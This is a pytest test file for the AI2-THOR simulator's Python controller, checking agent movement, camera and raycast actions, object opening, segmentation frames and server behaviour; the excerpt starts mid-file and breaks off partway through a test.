    assert query.metadata["actionReturn"].startswith(
        "Fridge"
    ), "x=0.3, y=0.5 should have a fridge!"
    event = controller.reset(renderInstanceSegmentation=True)
    assert event.metadata["screenHeight"] == 300
    assert event.metadata["screenWidth"] == 300

    # exhaustive test
    num_tested = 0
    for objectId in event.instance_masks.keys():
        for obj in event.metadata["objects"]:
            if obj["objectId"] == objectId:
                break
        else:
            # object may not be a sim object (e.g., ceiling, floor, wall, etc.)
            continue
        num_tested += 1
        mask = event.instance_masks[objectId]
        # subtract 3 pixels off the edge due to pixels being rounded and collider issues
        mask = Image.fromarray(mask)
        for _ in range(3):
            mask_edges = mask.filter(ImageFilter.FIND_EDGES)
            mask = ImageChops.subtract(mask, mask_edges)
        mask = np.array(mask)
        ys, xs = mask.nonzero()
        for x, y in zip(xs, ys):
            event = controller.step(
                action="GetObjectInFrame", x=x / 300, y=y / 300, forceAction=True
            )
            assert (
                event.metadata["actionReturn"] == objectId
            ), f"Failed at ({x / 300}, {y / 300}) for {objectId} with agent at: {event.metadata['agent']}"
    assert (
        num_tested == 29
    ), "There should be 29 objects in the frame, based on the agent's pose!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_coordinate_from_raycast(controller):
    """GetCoordinateFromRaycast returns fixed world points for known screen coords."""
    controller.reset(scene="FloorPlan28")
    event = controller.step(
        action="TeleportFull",
        position=dict(x=-1.5, y=0.900998235, z=-1.5),
        rotation=dict(x=0, y=90, z=0),
        horizon=0,
        standing=True,
    )
    assert event, "TeleportFull should have succeeded!"

    # out-of-range screen coordinates must fail
    for x, y in [(1.5, 0.5), (1.1, 0.3), (-0.1, 0.8), (-0.5, -0.3)]:
        query = controller.step("GetCoordinateFromRaycast", x=x, y=y)
        assert not query, f"x={x}, y={y} should fail!"

    expected = [
        ((0.5, 0.5), {"x": -0.344259053, "y": 1.57599819, "z": -1.49999917}),
        ((0.5, 0.2), {"x": -0.344259053, "y": 2.2694428, "z": -1.49999917}),
        (
            (0.25, 0.5),
            {
                "x": -0.5968407392501831,
                "y": 1.5759981870651245,
                "z": -1.0484200716018677,
            },
        ),
    ]
    for (x, y), world_point in expected:
        query = controller.step("GetCoordinateFromRaycast", x=x, y=y)
        assert_near(query.metadata["actionReturn"], world_point)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions_with_directions_relative_agent(controller):
    """With directionsRelativeAgent, the reachability grid follows the agent's
    unaligned rotation and must differ from the axis-aligned grid."""
    controller.reset("FloorPlan28")
    aligned_count = len(
        controller.step("GetReachablePositions").metadata["actionReturn"]
    )
    assert 100 < aligned_count < 125
    controller.step(
        action="TeleportFull",
        position=dict(x=-1, y=0.900998235, z=-1.25),
        rotation=dict(x=0, y=49.11111, z=0),
        horizon=0,
        standing=True,
    )
    # without the flag, the agent's rotation must not change the grid
    aligned_after_teleport = len(
        controller.step("GetReachablePositions").metadata["actionReturn"]
    )
    assert aligned_count == aligned_after_teleport
    unaligned_count = len(
        controller.step(
            "GetReachablePositions", directionsRelativeAgent=True
        ).metadata["actionReturn"]
    )
    assert 100 < unaligned_count < 125
    assert (
        unaligned_count != aligned_count
    ), "Number of reachable positions should differ when using `directionsRelativeAgent`"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_move(controller):
    """MoveAgent with ahead/right offsets moves the arm agent as expected."""
    start = controller.reset(scene="FloorPlan28", agentMode="arm")
    assert_near(
        point1={"x": -1.5, "y": 0.9009982347488403, "z": -1.5},
        point2=start.metadata["agent"]["position"],
    )
    moved = controller.step(action="MoveAgent", ahead=0.25, right=0.15)
    assert_near(
        point1={"x": -1.649999976158142, "y": 0.9009982347488403, "z": -1.75},
        point2=moved.metadata["agent"]["position"],
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_rotate(controller):
    """RotateAgent by a degree delta rotates the arm agent as expected."""
    start = controller.reset(scene="FloorPlan28", agentMode="arm")
    assert_near(
        point1={"x": -0.0, "y": 180.0, "z": 0.0},
        point2=start.metadata["agent"]["rotation"],
    )
    rotated = controller.step(action="RotateAgent", degrees=60)
    assert_near(
        point1={"x": -0.0, "y": 240.0, "z": 0.0},
        point2=rotated.metadata["agent"]["rotation"],
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_unsupported_manipulathor(controller):
    """The arm agent must reject the classic discrete move/rotate/pickup actions."""
    controller.reset(agentMode="arm")
    for action in (
        "MoveAhead",
        "MoveBack",
        "MoveLeft",
        "MoveRight",
        "RotateRight",
        "RotateLeft",
    ):
        resp = controller.step(action)
        assert not resp, action + " should have failed with agentMode=arm"
    resp = controller.step(action="PickupObject", x=0.5, y=0.5)
    assert not resp, "PickupObject(x, y) should have failed with agentMode=arm"
    pickupable_id = next(
        obj["objectId"] for obj in resp.metadata["objects"] if obj["pickupable"]
    )
    resp = controller.step(
        action="PickupObject", objectId=pickupable_id, forceAction=True
    )
    assert not resp, "PickupObject(objectId) should have failed with agentMode=arm"
| # import pytest
import os
import string
import random
import copy
import json
import pytest
import warnings
import jsonschema
import numpy as np
from ai2thor.controller import Controller
from ai2thor.tests.constants import TESTS_DATA_DIR
from ai2thor.wsgi_server import WsgiServer
from ai2thor.fifo_server import FifoServer
from PIL import ImageChops, ImageFilter, Image
import glob
import re
TEST_SCENE = "FloorPlan28"
# Defining const classes to lessen the possibility of a misspelled key
class Actions:
    """String constants for the action names used in these tests."""
    AddThirdPartyCamera = "AddThirdPartyCamera"
    UpdateThirdPartyCamera = "UpdateThirdPartyCamera"
class MultiAgentMetadata:
    """Metadata key constants for multi-agent events."""
    thirdPartyCameras = "thirdPartyCameras"
class ThirdPartyCameraMetadata:
    """Metadata key constants for a third-party camera entry."""
    position = "position"
    rotation = "rotation"
    fieldOfView = "fieldOfView"
def build_controller(**args):
    """Construct a Controller for TEST_SCENE, overriding defaults with *args*."""
    params = dict(scene=TEST_SCENE, local_build=True)
    params.update(args)
    # during a ci-build we will get a warning that we are using a commit_id
    # for the build instead of 'local'; silence it
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        controller = Controller(**params)
    # remember the initial parameters so reset_controller can restore them
    controller._original_initialization_parameters = (
        controller.initialization_parameters
    )
    return controller
# Module-level controllers shared by every test (reset before each use via
# reset_controller / setup_function).
_wsgi_controller = build_controller(server_class=WsgiServer)
_fifo_controller = build_controller(server_class=FifoServer)
_stochastic_controller = build_controller(agentControllerType="stochastic")
def skip_reset(controller):
    """Flag the controller's latest event so the next reset_controller() call
    skips the scene reset; any subsequent step replaces last_event and
    thereby clears the flag."""
    setattr(controller.last_event, "_pytest_skip_reset", True)
# resetting on each use so that each tests works with
# the scene in a pristine state
def reset_controller(controller):
    """Restore the controller's initialization parameters and reset the scene
    unless the previous consumer opted out via skip_reset()."""
    # deep copy so tests that mutate initialization_parameters can't corrupt
    # the saved originals
    controller.initialization_parameters = copy.deepcopy(
        controller._original_initialization_parameters
    )
    if not hasattr(controller.last_event, "_pytest_skip_reset"):
        controller.reset(TEST_SCENE)
    # mark the (possibly fresh) event so back-to-back calls don't double-reset
    skip_reset(controller)
    return controller
@pytest.fixture
def wsgi_controller():
    # shared WSGI-server controller, reset to a pristine TEST_SCENE
    return reset_controller(_wsgi_controller)
@pytest.fixture
def stochastic_controller():
    # shared stochastic-agent controller, reset to a pristine TEST_SCENE
    return reset_controller(_stochastic_controller)
@pytest.fixture
def fifo_controller():
    # shared FIFO-server controller, reset to a pristine TEST_SCENE
    return reset_controller(_fifo_controller)
# controller lists used to parametrize tests over the server/agent variants
fifo_wsgi = [_fifo_controller, _wsgi_controller]
fifo_wsgi_stoch = [_fifo_controller, _wsgi_controller, _stochastic_controller]
# canonical agent pose in FloorPlan28 used by the movement/teleport tests
BASE_FP28_POSITION = dict(x=-1.5, z=-1.5, y=0.901,)
BASE_FP28_LOCATION = dict(
    **BASE_FP28_POSITION, rotation={"x": 0, "y": 0, "z": 0}, horizon=0, standing=True,
)
def teleport_to_base_location(controller: Controller):
    """Teleport the agent to BASE_FP28_LOCATION, asserting we are in TEST_SCENE."""
    scene = controller.last_event.metadata["sceneName"].replace("_physics", "")
    assert scene == TEST_SCENE
    controller.step("TeleportFull", **BASE_FP28_LOCATION)
    assert controller.last_event.metadata["lastActionSuccess"]
def setup_function(function):
    """pytest hook: reset every shared controller before each test."""
    for c in [_fifo_controller, _wsgi_controller, _stochastic_controller]:
        reset_controller(c)
def teardown_module(module):
    """pytest hook: stop the shared controllers when the module finishes."""
    _wsgi_controller.stop()
    _fifo_controller.stop()
    _stochastic_controller.stop()
def assert_near(point1, point2, error_message=""):
    """Assert two dicts have identical keys and values within 1e-3 of each other."""
    assert point1.keys() == point2.keys(), error_message + "Keys mismatch."
    for key, value in point1.items():
        other = point2[key]
        assert abs(value - other) < 1e-3, (
            error_message + f"for {key} key, {value} != {other}"
        )
def test_stochastic_controller(stochastic_controller):
    """The stochastic-motion controller must be able to reset the test scene."""
    stochastic_controller.reset(TEST_SCENE)
    metadata = stochastic_controller.last_event.metadata
    assert metadata["lastActionSuccess"]
# Issue #514 found that the thirdPartyCamera image code was causing
# multi-agents to end up with the same frame
def test_multi_agent_with_third_party_camera(fifo_controller):
    """Two agents must keep distinct frames before and after adding a camera."""
    fifo_controller.reset(TEST_SCENE, agentCount=2)

    def frames_identical():
        events = fifo_controller.last_event.events
        return np.all(events[1].frame == events[0].frame)

    assert not frames_identical()
    event = fifo_controller.step(
        dict(
            action="AddThirdPartyCamera",
            rotation=dict(x=0, y=0, z=90),
            position=dict(x=-1.0, z=-2.0, y=1.0),
        )
    )
    assert not frames_identical()
# Issue #526 thirdPartyCamera hanging without correct keys in FifoServer FormMap
def test_third_party_camera_with_image_synthesis(fifo_controller):
    """Adding a camera must yield exactly one frame of each synthesis kind."""
    fifo_controller.reset(
        TEST_SCENE,
        renderInstanceSegmentation=True,
        renderDepthImage=True,
        renderSemanticSegmentation=True,
    )
    event = fifo_controller.step(
        dict(
            action="AddThirdPartyCamera",
            rotation=dict(x=0, y=0, z=90),
            position=dict(x=-1.0, z=-2.0, y=1.0),
        )
    )
    # one frame per enabled synthesis channel for the single added camera
    frame_lists = [
        event.third_party_depth_frames,
        event.third_party_semantic_segmentation_frames,
        event.third_party_camera_frames,
        event.third_party_instance_segmentation_frames,
    ]
    for frames in frame_lists:
        assert len(frames) == 1
def test_rectangle_aspect(fifo_controller):
    """A wide 600x300 window must yield frames shaped (300, 600, 3)."""
    width, height = 600, 300
    fifo_controller.reset(TEST_SCENE, width=width, height=height)
    event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
    assert event.frame.shape == (height, width, 3)
def test_small_aspect(fifo_controller):
    """A small 128x64 window must yield frames shaped (64, 128, 3)."""
    width, height = 128, 64
    fifo_controller.reset(TEST_SCENE, width=width, height=height)
    event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
    assert event.frame.shape == (height, width, 3)
def test_bot_deprecation(fifo_controller):
    """agentMode='bot' is deprecated and must alias to 'locobot'."""
    fifo_controller.reset(TEST_SCENE, agentMode="bot")
    agent_mode = fifo_controller.initialization_parameters["agentMode"]
    assert agent_mode.lower() == "locobot", "bot should alias to locobot!"
def test_deprecated_segmentation_params(fifo_controller):
    """Deprecated render params must still populate the renamed frames."""
    # renderObjectImage has been renamed to renderInstanceSegmentation
    # renderClassImage has been renamed to renderSemanticSegmentation
    fifo_controller.reset(
        TEST_SCENE, renderObjectImage=True, renderClassImage=True,
    )
    event = fifo_controller.last_event
    with warnings.catch_warnings():
        # reading class_segmentation_frame emits a DeprecationWarning
        warnings.simplefilter("ignore", category=DeprecationWarning)
        assert event.class_segmentation_frame is event.semantic_segmentation_frame
        assert event.semantic_segmentation_frame is not None
        assert (
            event.instance_segmentation_frame is not None
        ), "renderObjectImage should still render instance_segmentation_frame"
def test_deprecated_segmentation_params2(fifo_controller):
    """The renamed params must alias class_segmentation_frame too."""
    # renderObjectImage has been renamed to renderInstanceSegmentation
    # renderClassImage has been renamed to renderSemanticSegmentation
    fifo_controller.reset(
        TEST_SCENE, renderSemanticSegmentation=True, renderInstanceSegmentation=True,
    )
    event = fifo_controller.last_event
    with warnings.catch_warnings():
        # reading class_segmentation_frame emits a DeprecationWarning
        warnings.simplefilter("ignore", category=DeprecationWarning)
        assert event.class_segmentation_frame is event.semantic_segmentation_frame
        assert event.semantic_segmentation_frame is not None
        assert (
            event.instance_segmentation_frame is not None
        ), "renderObjectImage should still render instance_segmentation_frame"
def test_reset(fifo_controller):
    """reset() must honor width/height and toggle depth rendering on and off."""
    width = 520
    height = 310
    event = fifo_controller.reset(
        scene=TEST_SCENE, width=width, height=height, renderDepthImage=True
    )
    assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
    assert event.depth_frame is not None, "depth frame should have rendered!"
    assert event.depth_frame.shape == (
        height,
        width,
    ), "depth frame dimensions are wrong!"
    # resetting with renderDepthImage=False must drop the depth frame again
    width = 300
    height = 300
    event = fifo_controller.reset(
        scene=TEST_SCENE, width=width, height=height, renderDepthImage=False
    )
    assert event.depth_frame is None, "depth frame shouldn't have rendered!"
    assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
def test_fast_emit(fifo_controller):
    """Fast-emit actions must share (by identity) the previous event's
    objects list instead of re-serializing it; other actions must not."""
    event = fifo_controller.step(dict(action="RotateRight"))
    event_fast_emit = fifo_controller.step(dict(action="TestFastEmit", rvalue="foo"))
    event_no_fast_emit = fifo_controller.step(dict(action="LookUp"))
    event_no_fast_emit_2 = fifo_controller.step(dict(action="RotateRight"))
    assert event.metadata._raw_metadata["actionReturn"] is None
    assert event_fast_emit.metadata._raw_metadata["actionReturn"] == "foo"
    # fast-emit: objects list is the same object as in the prior event
    assert id(event.metadata._raw_metadata["objects"]) == id(
        event_fast_emit.metadata._raw_metadata["objects"]
    )
    # non-fast-emit actions must each produce a fresh objects list
    assert id(event.metadata._raw_metadata["objects"]) != id(
        event_no_fast_emit.metadata._raw_metadata["objects"]
    )
    assert id(event_no_fast_emit_2.metadata._raw_metadata["objects"]) != id(
        event_no_fast_emit.metadata._raw_metadata["objects"]
    )
def test_fifo_large_input(fifo_controller):
    """A 16 KiB payload must round-trip through the FIFO server unchanged."""
    payload = "".join(
        random.choice(string.ascii_letters) for _ in range(1024 * 16)
    )
    event = fifo_controller.step(
        dict(action="TestActionReflectParam", rvalue=payload)
    )
    assert event.metadata["actionReturn"] == payload
def test_fast_emit_disabled(fifo_controller):
    """With fastActionEmit off, each event must carry its own objects list."""
    controller = fifo_controller
    controller.reset(TEST_SCENE, fastActionEmit=False)
    first = controller.step(dict(action="RotateRight"))
    second = controller.step(dict(action="TestFastEmit", rvalue="foo"))
    # when fast emit is disabled the object lists are distinct copies
    assert id(first.metadata["objects"]) != id(second.metadata["objects"])
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_lookdown(controller):
    """LookDown lowers the camera horizon in 30-degree steps, clamped at 60."""
    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
    assert horizon == 0.0
    e = controller.step(dict(action="LookDown"))
    assert e.metadata["agent"]["position"] == position
    assert round(e.metadata["agent"]["cameraHorizon"]) == 30
    assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
    e = controller.step(dict(action="LookDown"))
    assert round(e.metadata["agent"]["cameraHorizon"]) == 60
    # a third LookDown is a no-op: horizon is clamped at 60 degrees
    e = controller.step(dict(action="LookDown"))
    assert round(e.metadata["agent"]["cameraHorizon"]) == 60
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_no_leak_params(controller):
    """step() must not mutate the caller's action dict (e.g. add sequenceId)."""
    action = dict(action="RotateLook", rotation=0, horizon=0)
    controller.step(action)
    assert "sequenceId" not in action
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_target_invocation_exception(controller):
    """Invalid arguments short-circuit on the Unity side: the event must
    report failure and carry a non-empty errorMessage."""
    # TargetInvocationException is raised when short circuiting failures occur
    # on the Unity side. It often occurs when invalid arguments are used.
    event = controller.step("OpenObject", x=1.5, y=0.5)
    assert not event.metadata["lastActionSuccess"], "OpenObject(x > 1) should fail."
    message = event.metadata["errorMessage"]
    assert message, "errorMessage should not be empty when OpenObject(x > 1)."
@pytest.mark.parametrize("controller", fifo_wsgi_stoch)
def test_lookup(controller):
    """LookUp raises the camera horizon to -30 degrees and clamps there."""
    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
    assert horizon == 0.0
    e = controller.step(dict(action="LookUp"))
    assert e.metadata["agent"]["position"] == position
    assert e.metadata["agent"]["cameraHorizon"] == -30.0
    assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
    # a second LookUp is a no-op: horizon is clamped at -30 degrees
    e = controller.step(dict(action="LookUp"))
    assert e.metadata["agent"]["cameraHorizon"] == -30.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_left(controller):
    """RotateLeft turns the agent 90 degrees counterclockwise (y: 0 -> 270)
    while leaving position and camera horizon untouched."""
    controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    start = controller.last_event.metadata["agent"]
    assert start["rotation"] == dict(x=0, y=0, z=0)
    event = controller.step(dict(action="RotateLeft"))
    agent = event.metadata["agent"]
    assert agent["position"] == start["position"]
    assert agent["cameraHorizon"] == start["cameraHorizon"]
    assert agent["rotation"]["y"] == 270.0
    assert agent["rotation"]["x"] == 0.0
    assert agent["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_simobj_filter(controller):
    """SetObjectFilter restricts metadata['objects'] to the given ids;
    ResetObjectFilter restores the full list."""
    objects = controller.last_event.metadata["objects"]
    unfiltered_object_ids = sorted([o["objectId"] for o in objects])
    filter_object_ids = sorted([o["objectId"] for o in objects[0:3]])
    e = controller.step(dict(action="SetObjectFilter", objectIds=filter_object_ids))
    assert len(e.metadata["objects"]) == len(filter_object_ids)
    filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
    assert filtered_object_ids == filter_object_ids
    # an empty filter hides every object
    e = controller.step(dict(action="SetObjectFilter", objectIds=[]))
    assert len(e.metadata["objects"]) == 0
    e = controller.step(dict(action="ResetObjectFilter"))
    reset_filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
    assert unfiltered_object_ids == reset_filtered_object_ids
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_add_third_party_camera(controller):
    """AddThirdPartyCamera must register a camera with the requested pose and
    reject malformed arguments (scalar position, Vector3 orthographicSize)."""
    expectedPosition = dict(x=1.2, y=2.3, z=3.4)
    expectedRotation = dict(x=30, y=40, z=50)
    expectedFieldOfView = 45.0
    assert (
        len(controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras]) == 0
    ), "there should be 0 cameras"
    e = controller.step(
        dict(
            action=Actions.AddThirdPartyCamera,
            position=expectedPosition,
            rotation=expectedRotation,
            fieldOfView=expectedFieldOfView,
        )
    )
    assert (
        len(e.metadata[MultiAgentMetadata.thirdPartyCameras]) == 1
    ), "there should be 1 camera"
    camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
    assert_near(
        camera[ThirdPartyCameraMetadata.position],
        expectedPosition,
        "initial position should have been set",
    )
    assert_near(
        camera[ThirdPartyCameraMetadata.rotation],
        expectedRotation,
        "initial rotation should have been set",
    )
    assert (
        camera[ThirdPartyCameraMetadata.fieldOfView] == expectedFieldOfView
    ), "initial fieldOfView should have been set"
    # expects position to be a Vector3, should fail!
    event = controller.step(
        action="AddThirdPartyCamera", position=5, rotation=dict(x=0, y=0, z=0)
    )
    assert not event.metadata[
        "lastActionSuccess"
    ], "position should not allow float input!"
    # orthographicSize expects float, not Vector3!
    error_message = None
    try:
        event = controller.step(
            action="AddThirdPartyCamera",
            position=dict(x=0, y=0, z=0),
            rotation=dict(x=0, y=0, z=0),
            orthographic=True,
            orthographicSize=dict(x=0, y=0, z=0),
        )
    except ValueError as e:
        error_message = str(e)
    assert error_message.startswith(
        "action: AddThirdPartyCamera has an invalid argument: orthographicSize"
    )
def test_update_third_party_camera(fifo_controller):
    """UpdateThirdPartyCamera must support full and partial pose updates and
    reject out-of-range fieldOfView values."""
    # add a new camera
    expectedPosition = dict(x=1.2, y=2.3, z=3.4)
    expectedRotation = dict(x=30, y=40, z=50)
    expectedFieldOfView = 45.0
    e = fifo_controller.step(
        dict(
            action=Actions.AddThirdPartyCamera,
            position=expectedPosition,
            rotation=expectedRotation,
            fieldOfView=expectedFieldOfView,
        )
    )
    assert (
        len(fifo_controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras])
        == 1
    ), "there should be 1 camera"
    # update camera pose fully
    expectedPosition = dict(x=2.2, y=3.3, z=4.4)
    expectedRotation = dict(x=10, y=20, z=30)
    expectedInitialFieldOfView = 45.0
    e = fifo_controller.step(
        dict(
            action=Actions.UpdateThirdPartyCamera,
            thirdPartyCameraId=0,
            position=expectedPosition,
            rotation=expectedRotation,
        )
    )
    camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
    assert_near(
        camera[ThirdPartyCameraMetadata.position],
        expectedPosition,
        "position should have been updated",
    )
    assert_near(
        camera[ThirdPartyCameraMetadata.rotation],
        expectedRotation,
        "rotation should have been updated",
    )
    # fieldOfView was omitted from the update, so it must be unchanged
    assert (
        camera[ThirdPartyCameraMetadata.fieldOfView] == expectedInitialFieldOfView
    ), "fieldOfView should not have changed"
    # partially update the camera pose
    changeFOV = 55.0
    expectedPosition2 = dict(x=3.2, z=5)
    expectedRotation2 = dict(y=90)
    e = fifo_controller.step(
        action=Actions.UpdateThirdPartyCamera,
        thirdPartyCameraId=0,
        fieldOfView=changeFOV,
        position=expectedPosition2,
        rotation=expectedRotation2,
    )
    camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
    assert (
        camera[ThirdPartyCameraMetadata.fieldOfView] == changeFOV
    ), "fieldOfView should have been updated"
    # components not named in the partial update keep their previous values
    expectedPosition.update(expectedPosition2)
    expectedRotation.update(expectedRotation2)
    assert_near(
        camera[ThirdPartyCameraMetadata.position],
        expectedPosition,
        "position should been slightly updated",
    )
    assert_near(
        camera[ThirdPartyCameraMetadata.rotation],
        expectedRotation,
        "rotation should been slightly updated",
    )
    # fieldOfView outside (0, 180) must fail
    # NOTE(review): `camera` below is the snapshot captured before this loop,
    # not re-read from `e` — so the pose asserts check the stale snapshot.
    # Presumably intentional (pose must be unchanged), but confirm.
    for fov in [-1, 181, 0]:
        e = fifo_controller.step(
            dict(
                action=Actions.UpdateThirdPartyCamera,
                thirdPartyCameraId=0,
                fieldOfView=fov,
            )
        )
        assert not e.metadata[
            "lastActionSuccess"
        ], "fieldOfView should fail outside of (0, 180)"
        assert_near(
            camera[ThirdPartyCameraMetadata.position],
            expectedPosition,
            "position should not have updated",
        )
        assert_near(
            camera[ThirdPartyCameraMetadata.rotation],
            expectedRotation,
            "rotation should not have updated",
        )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_look(controller):
    """RotateLook sets an absolute yaw and camera horizon without moving."""
    controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    start = controller.last_event.metadata["agent"]
    assert start["rotation"] == dict(x=0, y=0, z=0)
    event = controller.step(dict(action="RotateLook", rotation=90, horizon=31))
    agent = event.metadata["agent"]
    assert agent["position"] == start["position"]
    assert int(agent["cameraHorizon"]) == 31
    assert agent["rotation"]["y"] == 90.0
    assert agent["rotation"]["x"] == 0.0
    assert agent["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_right(controller):
    """RotateRight turns the agent 90 degrees clockwise (y: 0 -> 90) while
    leaving position and camera horizon untouched."""
    controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    start = controller.last_event.metadata["agent"]
    assert start["rotation"] == dict(x=0, y=0, z=0)
    event = controller.step(dict(action="RotateRight"))
    agent = event.metadata["agent"]
    assert agent["position"] == start["position"]
    assert agent["cameraHorizon"] == start["cameraHorizon"]
    assert agent["rotation"]["y"] == 90.0
    assert agent["rotation"]["x"] == 0.0
    assert agent["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_aabb_cache(controller):
    """The axis-aligned bounding box must be recomputed (not stale-cached)
    when an openable object opens and closes."""
    objects = controller.last_event.metadata["objects"]
    obj = next(obj for obj in objects if obj["objectType"] == "Fridge")
    start_aabb = obj["axisAlignedBoundingBox"]
    open_event = controller.step(
        action="OpenObject",
        objectId=obj["objectId"],
        forceAction=True,
        raise_for_failure=True,
    )
    obj = next(
        obj for obj in open_event.metadata["objects"] if obj["objectType"] == "Fridge"
    )
    open_aabb = obj["axisAlignedBoundingBox"]
    # opening the fridge must change its bounds
    assert start_aabb["size"] != open_aabb["size"]
    close_event = controller.step(
        action="CloseObject",
        objectId=obj["objectId"],
        forceAction=True,
        raise_for_failure=True,
    )
    obj = next(
        obj for obj in close_event.metadata["objects"] if obj["objectType"] == "Fridge"
    )
    close_aabb = obj["axisAlignedBoundingBox"]
    # closing must restore the original bounds
    assert start_aabb["size"] == close_aabb["size"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable_with_filter(controller):
    """An object must stay interactable (openable) even while an empty
    object filter hides all object metadata."""
    position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
    action = position.copy()
    action["rotation"] = dict(y=90)
    action["horizon"] = 0
    action["standing"] = True
    action["action"] = "TeleportFull"
    controller.step(action, raise_for_failure=True)
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["visible"], "Object is not interactable!"
    assert_near(controller.last_event.metadata["agent"]["position"], position)
    # hide all objects, then open the fridge while it is filtered out
    controller.step(dict(action="SetObjectFilter", objectIds=[]))
    assert controller.last_event.metadata["objects"] == []
    controller.step(
        action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
    )
    # NOTE(review): objectIds looks superfluous for ResetObjectFilter — confirm
    controller.step(dict(action="ResetObjectFilter", objectIds=[]))
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable(controller):
    """A visible fridge must be openable from a reachable teleport pose."""
    position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
    action = position.copy()
    action["rotation"] = dict(y=90)
    action["horizon"] = 0
    action["standing"] = True
    action["action"] = "TeleportFull"
    controller.step(action, raise_for_failure=True)
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["visible"], "Object is not interactable!"
    assert_near(controller.last_event.metadata["agent"]["position"], position)
    event = controller.step(
        action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
    )
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open(controller):
    """OpenObject/CloseObject must honor fractional openness, reject values
    outside [0, 1], and keep backwards compatibility with moveMagnitude."""
    objects = controller.last_event.metadata["objects"]
    obj_to_open = next(obj for obj in objects if obj["objectType"] == "Fridge")
    # helper that returns obj_to_open from a new event
    def get_object(event, object_id):
        return next(
            obj for obj in event.metadata["objects"] if obj["objectId"] == object_id
        )
    for openness in [0.5, 0.7, 0]:
        event = controller.step(
            action="OpenObject",
            objectId=obj_to_open["objectId"],
            openness=openness,
            forceAction=True,
            raise_for_failure=True,
        )
        opened_obj = get_object(event, obj_to_open["objectId"])
        assert abs(opened_obj["openness"] - openness) < 1e-3, "Incorrect openness!"
        assert opened_obj["isOpen"] == (openness != 0), "isOpen incorrectly reported!"
    # test bad openness values
    for bad_openness in [-0.5, 1.5]:
        event = controller.step(
            action="OpenObject",
            objectId=obj_to_open["objectId"],
            openness=bad_openness,
            forceAction=True,
        )
        assert not event.metadata[
            "lastActionSuccess"
        ], "0.0 > Openness > 1.0 should fail!"
    # test backwards compatibility on moveMagnitude, where moveMagnitude
    # is now `openness`, but when moveMagnitude = 0 that corresponds to openness = 1.
    event = controller.step(
        action="OpenObject",
        objectId=obj_to_open["objectId"],
        forceAction=True,
        moveMagnitude=0,
    )
    opened_obj = get_object(event, obj_to_open["objectId"])
    assert (
        abs(opened_obj["openness"] - 1) < 1e-3
    ), "moveMagnitude=0 must have openness=1"
    assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"
    # another moveMagnitude check
    test_openness = 0.65
    event = controller.step(
        action="OpenObject",
        objectId=obj_to_open["objectId"],
        forceAction=True,
        moveMagnitude=test_openness,
    )
    opened_obj = get_object(event, obj_to_open["objectId"])
    assert (
        abs(opened_obj["openness"] - test_openness) < 1e-3
    ), "moveMagnitude is not working!"
    assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"
    # a CloseObject specific check
    event = controller.step(
        action="CloseObject", objectId=obj_to_open["objectId"], forceAction=True
    )
    obj = get_object(event, obj_to_open["objectId"])
    assert abs(obj["openness"] - 0) < 1e-3, "CloseObject openness should be 0"
    assert not obj["isOpen"], "CloseObject should report isOpen==false!"
def test_action_dispatch(fifo_controller):
    """The physics agent must report the known set of ambiguous actions."""
    controller = fifo_controller
    event = controller.step(
        dict(action="TestActionDispatchFindAmbiguous"),
        typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
    )
    known_ambig = sorted(
        [
            "TestActionDispatchSAAmbig",
